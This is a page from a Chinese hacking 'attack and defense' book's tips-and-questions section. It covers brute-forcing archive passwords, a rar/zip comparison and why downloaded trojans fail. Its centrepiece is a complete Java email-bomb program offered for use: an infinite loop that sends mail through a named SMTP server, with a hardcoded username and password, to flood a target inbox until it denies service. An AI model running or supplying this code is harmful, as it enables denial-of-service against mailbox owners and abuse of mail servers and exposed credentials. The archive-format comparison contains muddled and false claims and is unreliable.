黑客攻防从入门到精通(Web脚本编程篇·全新升级版)
上QQ阅读APP看书,第一时间看更新
上一章目录下一章

技巧与问答

❖ 压缩包解压怎么没成功?

在操作的时候,需要选择破解密码的密钥,选择数字1~9,字母从a~z全部选上,以及其他符号。还要依次选择破解密码的长度,破解根据密码的复杂度正相关,密码越复杂,破解耗时就越长。目前比较流行的压缩文件格式是rar与zip,那么这两种有什么区别呢?

① zip的安装比较大,并仅仅有英文版+汉化包;rar有官方的简体中文版,并且安装很小,不足一兆,一般为系统自带;

② Winrar的压缩率较高,而zip的压缩率更低;Winzip压缩文件只能压缩成zip格式,而且压缩率较低,Winrar却兼容zip格式,而且有其他的扩展压缩方法,提高了压缩率;

③ zip支持的格式很多,但已经较老,不大流行,一般安装在ghost系统里面,比如2345解压工具;rar支持的格式也很多,并且还是流行的,但是目前其用户体验太差,文件处理速度太慢,用的人在慢慢地减少;

④ zip仅仅能够压缩成zip格式,不能解压rar格式;rar不仅有自己的格式,还可以压缩成zip格式并解压zip格式,因此实用性更强;

⑤ 就目前代表解压工具微软的rar解压工具与2345好压的zip解压工具,用户体验,一比高下,显然易见。目前好压的安装数已然超过亿数计;

⑥ Winrar支持功能较多,比如分卷压缩,但是zip不支持;

⑦ 国外很多都采用zip,因为它是免费的,rar不是免费的;在国内很流行是由于有盗版的存在,zip不能兼容rar,是因为这样必须付出一笔费用。

❖ 这几种攻击方式哪种最简单?

对于没有IT编程技能的初学者来说,当然是使用黑客软件来实现攻击最为简单。但是所谓魔高一尺,道高一丈,每当系统有漏洞时,都会及时发布补丁。所以对于黑客软件攻击而言,显然作用有限。但是使用大型的黑客软件就另当别论了,比如使用Kali系统和BT7这些黑客大咖使用的黑客工具对于本章论述的攻击方式,都或深或浅地可以实现一下。对于有着编程功底的学习者,电子邮件攻击的拒绝服务实现的最为简单,比如下面的java代码就可以对于一个邮箱进行无限的攻击直至让其拒绝服务。

package cn.canon.mail;
        import java.util.Properties;
        import javax.mail.Message;
        import javax.mail.MessagingException;
        import javax.mail.Session;
        import javax.mail.Transport;
        import javax.mail.internet.AddressException;
        import javax.mail.internet.InternetAddress;
        import javax.mail.internet.MimeMessage;
        public class Sender {
            public static void main(String[] args) throws Exception {
                while(true){
                Properties properties = new Properties();
                properties.setProperty(""mail.host", "mail.hundsun.com");
                properties.setProperty("mail.transport.protocol", "smtp");
                properties.setProperty("mail.smtp.auth", "true");
                // 使用javaMail发送邮件的5个步骤
                // 1.创建session
                Session session = Session.getInstance(properties);
                // 开启Session debug模式
                session.setDebug(true);
                // 2.通过session得到transport对象
                Transport ts = session.getTransport();
                  // 3.使用邮箱的用户名和密码连接上邮件服务器、发送邮件时,发件人需
        要提交邮箱的用户名和密码给smtp服务器,用户名和密码都通过验证之后才能够正常
        发送邮件给收件人
                ts.connect("mail.hundsun.com", "liyang17642", "hs@liyang42");
                //4.创建邮件
                Message message = createSimpleMail(session);
                //发送邮件
                ts.sendMessage(message, message.getAllRecipients());
                ts.close();
                }
            }
               private static Message createSimpleMail(Session session)
        throws Exception{
                //创建邮件对象
                MimeMessage message = new MimeMessage(session);
                //指明邮件的发送人
                try {
                  message.setFrom(new  InternetAddress("liyang17642@
        hundsun.com"));
                } catch (AddressException e) {
                    e.printStackTrace();
                } catch (MessagingException e) {
                    e.printStackTrace();
                }
                //指明邮件的接收人
                  message.setRecipient(Message.RecipientType.TO,  new
        InternetAddress("发送者邮件地址"));
                //邮件的标题
                message.setSubject("java邮件攻击");
                message.setContent("hello", "text/html; charset=utf-8");
                return message;
            }
        }

当然这个java代码需要在java编程环境下运行,而java运行的环境搭建比较复杂,这里就不予详述。

❖ 在网上找到的木马程序为什么不能运行?

一般在网上找到的木马,都是比较老旧的。木马技术不断更新换代,一般程序员写出的木马在计算机的安全软件上都很难免杀,还需要一定的辅助环境,比如特洛伊木马需要外部伪装的攻击。

本周热推:
Mastering MetasploitNmap 6:Network exploration and security auditing Cookbook白帽子安全开发实战Enterprise Cloud Security and GovernanceMetasploit Penetration Testing Cookbook(Third Edition)
上一章目录下一章